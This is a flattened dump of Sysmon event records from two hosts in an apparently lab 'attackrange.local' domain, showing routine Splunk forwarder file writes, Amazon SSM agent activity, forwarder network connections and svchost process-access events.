Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA70933F45EDCB8904C4CB47301E1454,SHA256=5F168FDB4F39BA682817C046F367F7DFDF818F49767414948F650D5456206EFF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080943Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:13.761{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49995-false10.0.1.12-8000- 23542300x800000000000000080942Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:16.908{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A76E0BE6A9968DBA42109E278E723AB,SHA256=EB953DD1E766291ACAABCE8B49B7276793BCCD184E60108D6AE9234E6B5454FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103108Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:16.631{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDCFDAE24BE0A864FDF25ED8A77970E1,SHA256=77CE148D832169274F62D7C0C2D8AAFCB4A850D4E4A11FFF73810C698C5649C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080944Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:17.908{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D2C8D36405DFE757F0E2A6A5C77E6EA,SHA256=684A330D55A31D1A0119CE40758EC2EE5660E19B771445D875D906930C580B26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103110Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:17.667{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-020MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103109Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:17.666{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB6CB5A88CCF96D13C26D1A25AE59285,SHA256=EEEFA90AFC35F2CE4392681C8A182562DD717A4B7E0113B579A888C8C4195401,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103112Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:18.681{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE5B8E1CBCDB378DD28FA6E1E0797C67,SHA256=C76EE3DF2586CABA3B276558777F06A3E7CDEC3ED2A37D8115339932B5E44EB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103111Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:18.680{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-021MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080946Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:18.971{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=96C02600AAB6B2BDE1F0A7FCDE7100A2,SHA256=8846B589A9EC026BA3A6E8B0A0F2FF9B9BEC4F70F3583F13393EDA7E7F3F1178,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080945Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:18.908{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14BFF933A04EC99EEBA3C150ED3107AB,SHA256=34C30A7572C54A2476E5D2D5044A810274DE5288D5F154F53FADD0F5347DE188,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080947Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:19.908{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD8BF4A26874B7567B353540931B3310,SHA256=E79C7FB0433A86EFBBDB70D473B65ADC9686082438EAB7CF919E3D19AB43D6F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103113Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:19.686{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A75E84A1B6D5D3A69EB0322A930826ED,SHA256=05330F73E09A61C11EB606A5474238C166795932E0CBE007B05857EE33C94C06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080948Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:20.908{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE0C15EC314EECF60E7E515B7C997A3,SHA256=C5972A1F7BC7E2A47FE32397BD1D1AB0E721D4B149C0F3AE334A3BFAC2E387BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103115Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:20.686{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE83E44857FBC5B1120270160C6AC518,SHA256=2C3906C32819A0BAF523A0A45FB5D852495B281F2C71FB44C91B4086BA4F70C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103114Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:19.368{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49492-false10.0.1.12-8000- 23542300x800000000000000080952Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:21.909{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5091D687645BC5A12A79DB169999C8BF,SHA256=C43CCB1B11FED0B6F2EE01A1449D15AF823890B5FDD8ABFB7251A74D25D68963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103116Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:21.686{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DB65FBC249C22941A25F45BE64CDA81,SHA256=117FB8B5CF02852B4BB05E3BCB1F624E6BBEBD1FA16C84EE56F25E1D3249EF49,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080951Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:21.252{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080950Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:21.252{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080949Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:21.252{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080954Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:22.971{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC4D282D355F76366CDD0AF03FBD5988,SHA256=3757A1DE9677048A7380ED4C89FF44F14E6702CFF9D34D24E46598CA0EAC67EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103117Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:22.686{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAF546F54ED803DA663BD544A6DE65DE,SHA256=3D9C19C383A9371403F47096E9FD7D966C036A6196B866391199481D4155B5ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080953Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:19.648{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49996-false10.0.1.12-8000- 23542300x8000000000000000103118Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:23.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A90F74FC07C44B069747A26F9FBD8973,SHA256=34C27662A1108491C5367F88FE8799797C816E581E3904EC1641AD00C7905820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103119Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:24.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EFA845AECBC906C98C5F7CAA21563E7,SHA256=DD3D085729DCA2D275553F04A6E0F355E7FA88D3D0ED6661565BACAC1A383078,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080955Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:24.127{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAA91778F6BDE6A0CA7FC01EC30D9451,SHA256=D0F02CF8371E6EDE0769734F02E9574E578292C442937DEB21450D48661159F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103121Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:25.780{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9395D9054F0A84FEF96F0D54884A24C,SHA256=0D8FBF44DDE9B5735A330844E149D17D0A4421054C4E54B8B03C0F2EAC603045,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080956Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:25.221{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F633AD10C4613933E2DA6D1A2342710,SHA256=BF583ECA76D52CF1782132586C6947064110DF1C135D76502149A2FCE85A6E57,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103120Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:24.467{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49493-false10.0.1.12-8000- 23542300x8000000000000000103122Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:26.811{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8689FBE385A959633E5F9FAD67419AE0,SHA256=EE4F045829CA3DFA07D4C77B283868EBCEBDC6734F83A80DD7DC532CC2D5F620,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080957Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:26.409{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97F1E10F81F9782E850D06AEBFE95599,SHA256=CC85C2B39D9FB17AC78E51D5124F7D2492F78A2BE8FCF3B8C8A23ACA8DBDE619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103123Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:27.811{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3AA2C4F474A7A4C440C908F5761144,SHA256=0A8D8A2051BC2D75D204CF4F668DF375116AF045B3C772465DA5519A0F61F036,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080959Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:24.758{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49997-false10.0.1.12-8000- 23542300x800000000000000080958Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:27.440{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=794586C26EC7C30FB4CFCEC842EBE9E9,SHA256=8A588D652CB19900284C6FB3BA0489AF4224F0DE0B10467678353A86EB1299CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103124Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:28.811{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0709F0E7418521A229548DE4644B61B2,SHA256=C3B4FA34EADDCA85AE2202DA2D9CCFDFCC5F77D2A90A2C0B26461CC68ABCC695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080960Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:28.471{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C78538FDE8AB8D5BAD9DFFB65F551697,SHA256=CC4D7A6D9BB968C33911C81B37F8AF29D145FE8B8C53D71AC8295E4CEEFDB477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103125Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:29.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE4134D6156E4AD640FB4718DB54279B,SHA256=FF9E6F9FC3A12B62C7039F1ED5C49EF2C94FE300D390437EE8C46EBDCB18F124,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080962Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:29.596{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080961Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:29.502{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4ED077BEE4D530029816223204830B7,SHA256=CE06F0296F1F470D4107651EB9E188F27030DC96AD4EB8C0F4F8F3E0C01C5D3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103126Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:30.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47A778353E0E5F0C6A7940120DCD43DB,SHA256=698FC0E2B2C74A50C8D6FD9DF46AC58AA2614F09992B81D9F391EE920A8C0D02,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080964Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:29.132{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49998-false10.0.1.12-8089- 23542300x800000000000000080963Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:30.643{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F54AF0282260AD29878842C6D30E526,SHA256=F5A88277DD8F5A250F65BDFAE26E10E32CB261CEB5211C2ACB2B8638986B2D27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080991Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B1CF-615A-3501-00000000FD01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080990Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080989Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:31.971{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080988Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 